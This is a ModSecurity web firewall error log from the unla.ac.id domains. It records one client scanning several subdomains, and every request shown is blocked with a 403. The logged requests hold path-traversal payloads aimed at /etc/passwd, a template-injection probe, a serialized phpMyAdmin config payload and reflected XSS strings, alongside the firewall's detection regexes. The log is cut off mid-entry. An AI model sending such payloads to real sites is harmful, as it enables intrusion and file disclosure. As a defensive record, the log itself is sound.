[Tue Aug 29 11:42:17.395558 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAddJrEAAAAh"]
[Tue Aug 29 11:42:17.401602 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAc92woAAAAD"]
[Tue Aug 29 11:42:17.401964 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAcsLGMAAAAE"]
[Tue Aug 29 11:42:18.408743 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KsCo-f0AAAdgyDQAAAAj"]
[Tue Aug 29 11:42:19.374501 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdhHzUAAAAB"]
[Tue Aug 29 11:42:19.375795 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAc92w0AAAAD"]
[Tue Aug 29 11:42:19.407596 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdUc0sAAAAZ"]
[Tue Aug 29 11:42:19.412301 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAcvBkAAAAAJ"]
[Tue Aug 29 11:42:19.419123 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAc92w8AAAAD"]
[Tue Aug 29 11:42:19.428642 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAcsLGcAAAAE"]
[Tue Aug 29 11:42:19.430534 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdECbYAAAAW"]
[Tue Aug 29 11:42:20.361714 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13LMCo-f0AAAdhHzcAAAAB"]
[Tue Aug 29 11:42:21.542070 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdUc08AAAAZ"]
[Tue Aug 29 11:42:21.547180 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAc-50oAAAAN"]
[Tue Aug 29 11:42:21.549213 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAcvBkQAAAAJ"]
[Tue Aug 29 11:42:21.561174 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdPLy0AAAAT"]
[Tue Aug 29 11:42:21.568508 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdECbsAAAAW"]
[Tue Aug 29 11:42:22.369758 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LsCo-f0AAAdeQ00AAAAQ"]
[Tue Aug 29 11:42:23.383436 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdeQ08AAAAQ"]
[Tue Aug 29 11:42:23.390279 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdqbFEAAAAR"]
[Tue Aug 29 11:42:23.407215 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdQ3gQAAAAV"]
[Tue Aug 29 11:42:23.408295 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAQSWzsAAAA0"]
[Tue Aug 29 11:42:23.409576 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdqbFIAAAAR"]
[Tue Aug 29 11:42:24.377799 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdrEmIAAAAn"]
[Tue Aug 29 11:42:24.396814 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdlvawAAAAl"]
[Tue Aug 29 11:42:24.406973 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAddJrkAAAAh"]
[Tue Aug 29 11:42:24.408671 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdOeQoAAAAS"]
[Tue Aug 29 11:42:24.410788 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 